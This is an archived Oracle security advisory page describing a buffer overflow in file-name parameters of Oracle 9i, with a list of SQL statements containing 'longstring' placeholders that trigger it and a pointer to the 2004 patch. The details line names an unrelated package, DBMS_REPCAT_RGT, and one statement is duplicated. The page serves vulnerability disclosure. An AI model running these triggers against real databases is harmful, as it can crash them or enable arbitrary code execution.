|
Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company |
Buffer Overflow in File Parameter in Oracle 9i
Details Buffer Overflow in DBMS_REPCAT_RGT. This package has EXECUTE permission granted to SYSDBA or EXECUTE_CATALOG_ROLE. Members of these groups can exploit this vulnerability and crash the database or execute arbitrary code. Example ALTER DATABASE RENAME FILE 'longstring' TO 'anything'; ALTER DATABASE RENAME FILE 'longstring' TO 'anything'; ALTER DATABASE BACKUP CONTROLFILE TO 'longstring'; ALTER DATABASE CREATE STANDBY CONTROLFILE AS'longstring'; ALTER TABLESPACE TablespaceName ADD TEMPFILE 'longstring'; CREATE TEMPORARY TABLESPACE TablespaceName TEMPFILE 'longstring'; ALTER DATABASE TEMPFILE 'longstring' online; ALTER DATABASE CLEAR LOGFILE 'longstring'; ALTER DATABASE RECOVER LOGFILE 'longstring'; ALTER DATABASE DROP LOGFILE MEMBER 'longstring'; ALTER DATABASE datafile 'longstring' ONLINE; ALTER INDEX indexname allocate extent(datafile 'longstring'); CREATE TABLESPACE tablespacename DATAFILE 'longstring'; ALTER CLUSTER clustername allocate extent(datafile 'longstring'); Patch Information Apply the latest Oracle Security patches (e.g. CPU April 2004 or at least alert 68). © 2005 by Red-Database-Security GmbH - last update 02-nov-2005 |
Definition Exploit |